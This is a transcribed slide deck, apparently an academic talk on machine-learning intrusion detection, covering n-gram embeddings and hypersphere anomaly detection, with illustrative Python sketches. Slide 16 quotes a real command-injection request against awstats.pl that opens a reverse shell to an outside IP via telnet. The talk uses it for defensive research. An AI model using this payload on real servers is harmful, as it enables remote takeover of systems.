Machine Learning


  1. Machine Learning for Network Intrusion Detection • Dr. Marius Kloft, Dipl.-Math.

  2. Personal Information Berkeley, California • Dr. Marius Kloft • Studies • in physics and mathematics • at University of Marburg • in computer science • in Berkeley and Berlin • Degrees • Dipl.-Mathematiker, 2006 • Thesis in pure math • Dr. rer. nat., 2011 • Thesis in cs and statistics • PhD advisors • Prof. Dr. Klaus-Robert Müller • (EECS, TU Berlin) • Prof. Dr. Peter L. Bartlett • (EECS & Statistics, UC Berkeley) • Prof. Dr. Gilles Blanchard • (Statistics, Uni Potsdam)

  3. Dr. Marius Kloft • Current occupation • Post-Doc • jointly appointed at • Machine Learning Laboratory, TU Berlin • Head: Prof. Dr. Klaus-Robert Müller • Friedrich-Miescher Laboratory, Max Planck Society, Tübingen • Head: Dr. Gunnar Rätsch (will be transferred to Sloan Center for Cancer Research, New York) • I am heading the SeqML project team (Berlin/Tübingen) • 2 PhD students • 4 Master students • PI: Prof. Müller • Goal • development of intelligent algorithms (“machine learning”) • for computational genome annotation

  4. Dr. Marius Kloft • Research interests • Statistical machine learning methods • Development of new algorithms • mathematical optimization thereof • Analysis of their statistical properties • in terms of probabilistic bounds • Multiple Kernel Learning • My PhD thesis: “Lp-Norm Multiple Kernel Learning” • Applications • Detection of genes in genomic DNA • Detection of attacks in computer networks • Categorization of images

  5. Machine Learning Laboratory, TU Berlin • Some facts • Head • Prof. Dr. Klaus-Robert Müller • Scientists • 11 post-docs • 35 PhD students • Research focus • Development of novel intelligent algorithms • for analysis of complex data • Remind project • Joint project of TU Berlin and Fraunhofer FIRST, Berlin • Development of intelligent methods for detecting intrusions in computer networks • Facts • Until 2010 • 2 post-docs • 5 PhD students • Spin-off “Trifense GmbH” awarded first prize in the „Gründungswettbewerb“ (BMWi)

  6. Machine Learning for Intrusion Detection • Joint work with the members of the Remind project team: Konrad Rieck, Pavel Laskov, Ulf Brefeld, Christian Gehl, Tammo Krüger, Patrick Düssel, Nico Görnitz, Rene Gerstenberger, Guido Schwenk

  7. Machine Learning for Intrusion Detection: Talk Overview • Danger from the internet • What is machine learning (ML)? • Algorithms for intrusion detection • Empirical analysis

  8. Danger from the Internet • Internet as a risk factor: • Omnipresence of computer worms, viruses and trojans • Major damage to companies and customers • Increasing criminalization

  9. Why do we still get hacked? • New vulnerabilities are discovered • 2,000-3,000 vulnerabilities per year • New attacks are developed • high degree of automation • Incident response is too slow

  10. How secure are modern detection tools? • Experiment • Current instances of malware were collected from a Nepenthes honeypot • Files were scanned with Avira AntiVir • Results • First scan: • Second scan: • Conclusion • After four weeks, 15% of malware instances were still not recognized!

  11. Machine Learning for Intrusion Detection: Talk Overview • Danger from the internet • What is machine learning (ML)? • Algorithms for intrusion detection • Empirical analysis

  12. What is statistical machine learning? • Given: • Data x1, …, xn • E.g., xi could be an HTTP request (e.g., a computer attack) • Concepts y1, …, yn • E.g., yi=1 could mean that xi is a computer attack • Goal: • Finding a function f that models the dependency between xi and yi • i.e., f(xi) ≈ yi • So that f generalizes to novel, previously unseen (x,y) • i.e., f(x) ≈ y • 2-step approach: • 1. Training: • Input data and concepts into learning algorithm • Learning algorithm outputs f • 2. Prediction: • Use f(x) to predict labels y for new, unseen x • Core idea • Choose an f that • Fits the data well • But is not too “complex”
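
The two-step approach on this slide can be sketched in a few lines of Python. This is a minimal illustration, not the learning algorithm used in the talk: the nearest-centroid rule, the two toy features, and the label 0 for benign requests are all assumptions made for the example (the slide only fixes yi=1 for attacks).

```python
from typing import Callable, List, Sequence

Vector = Sequence[float]


def train(xs: List[Vector], ys: List[int]) -> Callable[[Vector], int]:
    """Training step: take data xs and concepts ys, return a function f."""

    def centroid(points: List[Vector]) -> List[float]:
        n = len(points)
        return [sum(p[d] for p in points) / n for d in range(len(points[0]))]

    # One centroid per class; label 1 = attack, label 0 = benign (assumed).
    c_attack = centroid([x for x, y in zip(xs, ys) if y == 1])
    c_benign = centroid([x for x, y in zip(xs, ys) if y == 0])

    def sq_dist(a: Vector, b: Vector) -> float:
        return sum((ai - bi) ** 2 for ai, bi in zip(a, b))

    def f(x: Vector) -> int:
        # Prediction step: assign x to the class with the closer centroid.
        return 1 if sq_dist(x, c_attack) < sq_dist(x, c_benign) else 0

    return f


# Hypothetical 2-d features of four HTTP requests (made-up numbers).
xs = [(0.9, 0.8), (0.8, 0.9), (0.1, 0.2), (0.2, 0.1)]
ys = [1, 1, 0, 0]

f = train(xs, ys)          # 1. Training
label = f((0.85, 0.7))     # 2. Prediction on a new, unseen x
```

The learned f is deliberately simple: it is determined by two centroids only, which is one way of keeping f "not too complex".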

  13. Example: Trade-off of Fit and Complexity • Data: • Which f to choose? • Linear f • Misses two points (too simple) • Polynomial f • Pro: perfect on training data • Contra: does not generalize to new data • Too complex • Machine learning solution: • Not too complex, not too simple
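
The trade-off can be reproduced with a small experiment. The sketch below is an illustration under assumptions: the data points are made up (roughly following y = x with noise) and are not the data shown on the slide. It compares a least-squares line with a polynomial that interpolates every training point.

```python
from typing import Callable, List, Tuple

Point = Tuple[float, float]


def fit_line(data: List[Point]) -> Callable[[float], float]:
    """Least-squares straight line through the data (simple model)."""
    n = len(data)
    mx = sum(x for x, _ in data) / n
    my = sum(y for _, y in data) / n
    sxx = sum((x - mx) ** 2 for x, _ in data)
    sxy = sum((x - mx) * (y - my) for x, y in data)
    slope = sxy / sxx
    intercept = my - slope * mx
    return lambda x: slope * x + intercept


def fit_interpolating_polynomial(data: List[Point]) -> Callable[[float], float]:
    """Lagrange polynomial through every training point (complex model)."""

    def f(x: float) -> float:
        total = 0.0
        for j, (xj, yj) in enumerate(data):
            basis = 1.0
            for m, (xm, _) in enumerate(data):
                if m != j:
                    basis *= (x - xm) / (xj - xm)
            total += yj * basis
        return total

    return f


def mse(f: Callable[[float], float], data: List[Point]) -> float:
    """Mean squared error of f on the given points."""
    return sum((f(x) - y) ** 2 for x, y in data) / len(data)


# Made-up training and held-out points, roughly on the line y = x.
train_points = [(0.0, 0.1), (1.0, 0.9), (2.0, 2.2), (3.0, 2.8), (4.0, 4.1)]
test_points = [(0.5, 0.5), (5.0, 5.0)]

line = fit_line(train_points)
poly = fit_interpolating_polynomial(train_points)

line_train, line_test = mse(line, train_points), mse(line, test_points)
poly_train, poly_test = mse(poly, train_points), mse(poly, test_points)
print(f"line: train={line_train:.4f} test={line_test:.4f}")
print(f"poly: train={poly_train:.4f} test={poly_test:.4f}")
```

On this toy data the polynomial has zero training error but a much larger held-out error than the line, which is the "perfect on training data, does not generalize" case from the slide.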

  14. Machine Learning for Intrusion Detection: Talk Overview • Danger from the internet • What is machine learning (ML)? • Algorithms for intrusion detection • Empirical analysis

  15. Benefits of Machine Learning to Intrusion Detection • Ability to generalize from large amounts of data • automation of decision making • faster incident response times • Understanding of statistical foundations of empirical inference • better accuracy, low false alarm rates • Ability to detect novelty • protection against new attacks

  16. What Does Network Payload Look Like? • Innocuous payload • GET / HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aCookie: POPUPCHECK=1150521721386\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost: www.spiegel.de • Malicious payload • GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;sleep%207200%7ctelnet%20194%2e95%2e173%2e219%204321%7cwhile%20%3a%20%3b%20do%20sh%20%26%26%20break%3b%20done%202%3e%261%7ctelnet%20194%2e95%2e173%2e219%204321;echo%20YYY;echo|HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x0d\x0aHost: wuppi.dyndns.org:80\x0d\x0aConnection: Close\x0d\x0a\x0d\x0a

  17. From Network Payload to Vectors • General idea • count occurrences of substrings (“n-grams”) • Example: • Define an appropriate embedding function: • In the end, payload is represented as vectors:
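
The example and the embedding function on this slide were figures and did not survive in the transcript. As a hedged stand-in, the sketch below counts byte n-grams with a sliding window and stores them as a sparse vector; the function name `ngram_counts` and the choice of byte-level n-grams are assumptions for illustration.

```python
from collections import Counter


def ngram_counts(payload: bytes, n: int) -> Counter:
    """Embed a payload as a sparse vector: n-gram -> number of occurrences."""
    return Counter(payload[i:i + n] for i in range(len(payload) - n + 1))


# Toy payload: the 2-grams of b"abab" are "ab", "ba", "ab".
vec = ngram_counts(b"abab", 2)
print(vec[b"ab"], vec[b"ba"], vec[b"zz"])  # prints "2 1 0"

# The same function applies to a request line from a real payload.
request = ngram_counts(b"GET / HTTP/1.1\r\n", 3)
```

A `Counter` only stores n-grams that actually occur, which matters because the space of all possible byte n-grams (256^n dimensions) is far too large to store densely.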

  18. Detection of New Attacks • (Rieck et al., DIMVA 2007) • Anomaly-based machine learning approach • Represent network payload as vectors • Finding a hypersphere • that encloses the innocuous data (blue circles) • and generalizes to new data • Points outside of the hypersphere (red circles) • are flagged as being anomalous
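
The slide does not say how the hypersphere is fitted, so the sketch below substitutes the simplest possible choice and should not be read as the method of Rieck et al.: the center is the mean of the innocuous training vectors, and the radius is a quantile of their distances to that center. The function names and the `quantile` parameter are hypothetical.

```python
import math
from typing import List, Sequence, Tuple

Vector = Sequence[float]


def fit_sphere(points: List[Vector], quantile: float = 1.0) -> Tuple[List[float], float]:
    """Fit a sphere to innocuous data: mean as center, distance quantile as radius."""
    dim = len(points[0])
    center = [sum(p[d] for p in points) / len(points) for d in range(dim)]
    dists = sorted(math.dist(p, center) for p in points)
    # quantile=1.0 encloses all training points; smaller values tolerate outliers.
    idx = min(len(dists) - 1, max(0, math.ceil(quantile * len(dists)) - 1))
    return center, dists[idx]


def is_anomalous(x: Vector, center: Vector, radius: float) -> bool:
    """Flag points that fall outside the sphere."""
    return math.dist(x, center) > radius


# Made-up 2-d embeddings of innocuous payloads.
benign = [(0.0, 0.0), (2.0, 0.0), (0.0, 2.0), (2.0, 2.0)]
center, radius = fit_sphere(benign)

inside = is_anomalous((1.5, 1.2), center, radius)   # close to the benign data
outside = is_anomalous((5.0, 5.0), center, radius)  # far from the benign data
```

Only innocuous data is needed for training, which is what allows this kind of detector to flag attacks it has never seen.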

  19. How well does our system work? • Detection results • Evaluation on a real attack dataset generated by a penetration testing expert • Detection of 80-93% of unknown attacks in HTTP, FTP and SMTP protocols without false alarms • Major improvement of accuracy in comparison to the standard signature-based IDS Snort
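
A detection rate "without false alarms" can be read as follows: the alarm threshold is set so that no innocuous example exceeds it, and the detection rate is the fraction of attacks above that threshold. The sketch below illustrates this reading only; the slide does not describe the evaluation protocol, and all scores are made up.

```python
from typing import List, Tuple


def detection_rate_at_zero_false_alarms(
    benign_scores: List[float], attack_scores: List[float]
) -> Tuple[float, float]:
    """Return (threshold, detection rate) with no benign score above the threshold."""
    threshold = max(benign_scores)
    detected = sum(1 for s in attack_scores if s > threshold)
    return threshold, detected / len(attack_scores)


# Made-up anomaly scores (e.g., distance to the center of the hypersphere).
benign_scores = [0.1, 0.3, 0.2, 0.4]
attack_scores = [0.9, 0.35, 0.7, 0.5]

threshold, rate = detection_rate_at_zero_false_alarms(benign_scores, attack_scores)
print(threshold, rate)  # prints "0.4 0.75"
```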

  20. Outlook: Extensions of the Framework • Active learning • Finding data points that, when presented to a security expert for labeling, maximally improve the performance of the system • Problem: which data points to present? • In a nutshell: focus on points that contain novel, uncertain information • Automatic feature selection • Payloads can be represented by various feature embeddings • Which feature embedding to take? • “Multiple Kernel Learning” approach: • Use all embeddings simultaneously • But take a weighted combination • Do it automatically at training time • (M. Kloft, PhD thesis, 2011) • (e.g., Görnitz, Kloft et al., ACM AISEC 2009, ECML 2009) • (e.g., Kloft et al., ACM AISEC 2008, ECML 2009, NIPS 2009, ECML 2010, NIPS 2011, JMLR 2011)
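
The "weighted combination" of embeddings can be sketched as a weighted sum of kernels, one per embedding. This is an illustration under assumptions: the embeddings are byte n-grams of different lengths, the kernel is a plain dot product, and the weights are fixed by hand. In Multiple Kernel Learning the weights are learned at training time, which this sketch does not do.

```python
from collections import Counter
from typing import Dict


def ngram_counts(payload: bytes, n: int) -> Counter:
    """Sparse n-gram count vector of a payload."""
    return Counter(payload[i:i + n] for i in range(len(payload) - n + 1))


def linear_kernel(a: Counter, b: Counter) -> int:
    """Dot product of two sparse count vectors."""
    return sum(count * b[gram] for gram, count in a.items())


def combined_kernel(x: bytes, y: bytes, weights: Dict[int, float]) -> float:
    """Weighted sum of linear kernels, one per n-gram length in `weights`."""
    return sum(
        theta * linear_kernel(ngram_counts(x, n), ngram_counts(y, n))
        for n, theta in weights.items()
    )


# Hand-picked placeholder weights; an MKL solver would learn these instead.
weights = {1: 0.5, 2: 0.5}
value = combined_kernel(b"abab", b"abba", weights)
print(value)  # prints "5.5"
```

Here the 1-gram kernel equals 8 and the 2-gram kernel equals 3, so the combination is 0.5 * 8 + 0.5 * 3 = 5.5. A weight of zero would switch an embedding off entirely, which is how the weighting acts as feature selection.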

  21. Conclusions • Intrusion detection • Detecting malicious payload in network streams • Machine learning approach • Embedding of application payloads in vector spaces • Detection of anomalies in embedded data • Empirical analysis • Detection of 80-93% of unknown attacks • No false positives • Allows one to find novel attacks
